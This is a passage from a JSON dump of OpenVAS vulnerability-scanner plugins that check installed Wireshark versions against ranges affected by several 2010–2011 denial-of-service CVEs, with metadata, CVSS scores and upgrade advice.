vulnerability.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nwiresharkVer = get_kb_item(\"Wireshark/MacOSX/Version\");\nif(!wiresharkVer){\n exit(0);\n}\n\nif(version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n report = report_fixed_ver(installed_version:wiresharkVer, vulnerable_range:\"1.4.0 - 1.4.4\");\n security_message(port:0, data:report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:40:11", "description": "This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark SMB dissector Denial of Service Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283"], "modified": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310902196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902196", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_smb_dissector_dos_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Wireshark SMB dissector Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902196\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2283\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Wireshark SMB dissector Denial of Service Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/40112\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attackers to crash an affected\n application.\");\n script_tag(name:\"affected\", value:\"Wireshark version 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8\");\n script_tag(name:\"insight\", value:\"The flaw is caused by a NULL pointer dereference error in the 'SMB' dissector,\n which could be exploited to crash an affected application via unknown vectors.\");\n script_tag(name:\"solution\", value:\"Upgrade to Wireshark version 1.0.14 or 1.2.9:\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.99.6\", test_version2:\"1.0.13\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:10:00", "description": "This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark SMB dissector Denial of Service Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283"], "modified": "2017-02-23T00:00:00", "id": "OPENVAS:902196", "href": "http://plugins.openvas.org/nasl.php?oid=902196", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_smb_dissector_dos_vuln_win.nasl 5401 2017-02-23 09:46:07Z teissa $\n#\n# Wireshark SMB dissector Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attackers to crash an affected\n application.\n Impact Level: Application\";\ntag_affected = \"Wireshark version 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8\";\ntag_insight = \"The flaw is caused by a NULL pointer dereference error in the 'SMB' dissector,\n which could be exploited to crash an affected application via unknown vectors.\";\ntag_solution = \"Upgrade to Wireshark version 1.0.14 or 1.2.9:\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.\";\n\nif(description)\n{\n script_id(902196);\n script_version(\"$Revision: 5401 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-23 10:46:07 +0100 (Thu, 23 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2283\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Wireshark SMB dissector Denial of Service Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40112\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_require_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\n# Check for Wireshark version\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.99.6\", test_version2:\"1.0.13\")){\n security_message(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:09:51", "description": "This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2286"], "modified": "2017-02-23T00:00:00", "id": "OPENVAS:902198", "href": "http://plugins.openvas.org/nasl.php?oid=902198", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl 5401 2017-02-23 09:46:07Z teissa $\n#\n# Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attackers to crash an affected application.\n Impact Level: Application\";\ntag_affected = \"Wireshark version 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8\";\ntag_insight = \"The flaw is caused by an off-by-one error within the SigComp Universal\n Decompressor Virtual Machine, which could be exploited by attackers to\n crash an affected application or execute arbitrary code via unknown vectors.\";\ntag_solution = \"Upgrade to Wireshark version 1.0.14 or 1.2.9:\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.\";\n\nif(description)\n{\n script_id(902198);\n script_version(\"$Revision: 5401 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-23 10:46:07 +0100 (Thu, 23 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2286\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40112\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_require_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\n# Check for Wireshark version\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.10.7\", test_version2:\"1.0.13\")){\n security_message(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:09", "description": "This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2286"], "modified": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310902198", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902198", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_sigcomp_dissector_dos_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902198\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2286\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Wireshark SigComp Universal Decompressor Virtual Machine dissector DOS Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/40112\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attackers to crash an affected application.\");\n script_tag(name:\"affected\", value:\"Wireshark version 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8\");\n script_tag(name:\"insight\", value:\"The flaw is caused by an off-by-one error within the SigComp Universal\n Decompressor Virtual Machine, which could be exploited by attackers to\n crash an affected application or execute arbitrary code via unknown vectors.\");\n script_tag(name:\"solution\", value:\"Upgrade to Wireshark version 1.0.14 or 1.2.9:\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to Denial of\n Service vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.10.7\", test_version2:\"1.0.13\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:38", "description": "This host is installed with Wireshark and is prone to denial of\n service vulnerability.", "cvss3": {}, "published": "2012-04-26T00:00:00", "type": "openvas", "title": "Wireshark X.509if Dissector Denial of Service Vulnerability (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310903022", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310903022", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_dissector_dos_vuln_macosx.nasl 11857 2018-10-12 08:25:16Z cfischer $\n#\n# Wireshark X.509if Dissector Denial of Service Vulnerability (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.903022\");\n script_version(\"$Revision: 11857 $\");\n script_cve_id(\"CVE-2011-1590\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:25:16 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 10:21:42 +0530 (Thu, 26 Apr 2012)\");\n script_name(\"Wireshark X.509if Dissector Denial of Service Vulnerability (Mac OS X)\");\n\n\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_macosx.nasl\");\n script_mandatory_keys(\"Wireshark/MacOSX/Version\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to cause a denial of service\n via crafted '.pcap' file.\");\n script_tag(name:\"affected\", value:\"Wireshark version 1.2.0 through 1.2.15\n Wireshark version 1.4.0 through 1.4.4\");\n script_tag(name:\"insight\", value:\"The flaw is caused by an error in the 'X.509if' dissector when processing\n malformed data, which could be exploited to crash an affected application.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Wireshark version 1.4.5 or 1.2.16 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to denial of\n service vulnerability.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1025388\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/1022\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nwiresharkVer = get_kb_item(\"Wireshark/MacOSX/Version\");\nif(!wiresharkVer){\n exit(0);\n}\n\nif(version_in_range(version:wiresharkVer, test_version:\"1.2.0\", test_version2:\"1.2.15\")||\n version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:57", "description": "The host is installed with Wireshark and is prone to denial of\n service vulnerability.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "openvas", "title": "Wireshark X.509if Dissector Denial of service vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590"], "modified": "2018-10-20T00:00:00", "id": "OPENVAS:1361412562310801785", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801785", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_dissector_dos_vuln_win_may11.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Wireshark X.509if Dissector Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801785\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-16 15:25:30 +0200 (Mon, 16 May 2011)\");\n script_cve_id(\"CVE-2011-1590\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Wireshark X.509if Dissector Denial of service vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1025388\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/1022\");\n\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to cause a denial of service via\n a crafted .pcap file.\");\n script_tag(name:\"affected\", value:\"Wireshark version 1.2.0 through 1.2.15\n Wireshark version 1.4.0 through 1.4.4\");\n script_tag(name:\"insight\", value:\"The flaw is caused by an error in the 'X.509if' dissector when processing\n malformed data, which could be exploited to crash an affected application.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Wireshark version 1.4.5 or 1.2.16 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Wireshark and is prone to denial of\n service vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nwiresharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!wiresharkVer){\n exit(0);\n}\n\nif(version_in_range(version:wiresharkVer, test_version:\"1.2.0\", test_version2:\"1.2.15\")||\n version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-02T21:10:55", "description": "This host is installed with Wireshark and is prone to denial of\n service vulnerability.", "cvss3": {}, "published": "2012-04-26T00:00:00", "type": "openvas", "title": "Wireshark X.509if Dissector Denial of Service Vulnerability (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590"], "modified": "2017-04-24T00:00:00", "id": "OPENVAS:903022", "href": "http://plugins.openvas.org/nasl.php?oid=903022", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_dissector_dos_vuln_macosx.nasl 6018 2017-04-24 09:02:24Z teissa $\n#\n# Wireshark X.509if Dissector Denial of Service Vulnerability (Mac OS X)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to cause a denial of service\n via crafted '.pcap' file.\n Impact Level: System/Application\";\ntag_affected = \"Wireshark version 1.2.0 through 1.2.15\n Wireshark version 1.4.0 through 1.4.4\";\ntag_insight = \"The flaw is caused by an error in the 'X.509if' dissector when processing\n malformed data, which could be exploited to crash an affected application.\";\ntag_solution = \"Upgrade to the Wireshark version 1.4.5 or 1.2.16 or later,\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"This host is installed with Wireshark and is prone to denial of\n service vulnerability.\";\n\nif(description)\n{\n script_id(903022);\n script_version(\"$Revision: 6018 $\");\n script_cve_id(\"CVE-2011-1590\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-24 11:02:24 +0200 (Mon, 24 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-26 10:21:42 +0530 (Thu, 26 Apr 2012)\");\n script_name(\"Wireshark X.509if Dissector Denial of Service Vulnerability (Mac OS X)\");\n\n\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_macosx.nasl\");\n script_require_keys(\"Wireshark/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1025388\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/1022\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nwiresharkVer = \"\";\n\n## Get the version from KB\nwiresharkVer = get_kb_item(\"Wireshark/MacOSX/Version\");\nif(!wiresharkVer){\n exit(0);\n}\n\n## Check for Wireshark Version\nif(version_in_range(version:wiresharkVer, test_version:\"1.2.0\", test_version2:\"1.2.15\")||\n version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-09-04T14:19:36", "description": "The host is installed with Wireshark and is prone to denial of\n service vulnerability.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "openvas", "title": "Wireshark X.509if Dissector Denial of service vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590"], "modified": "2017-08-28T00:00:00", "id": "OPENVAS:801785", "href": "http://plugins.openvas.org/nasl.php?oid=801785", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_dissector_dos_vuln_win_may11.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# Wireshark X.509if Dissector Denial of Service Vulnerability (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to cause a denial of service via\n a crafted .pcap file.\n Impact Level: 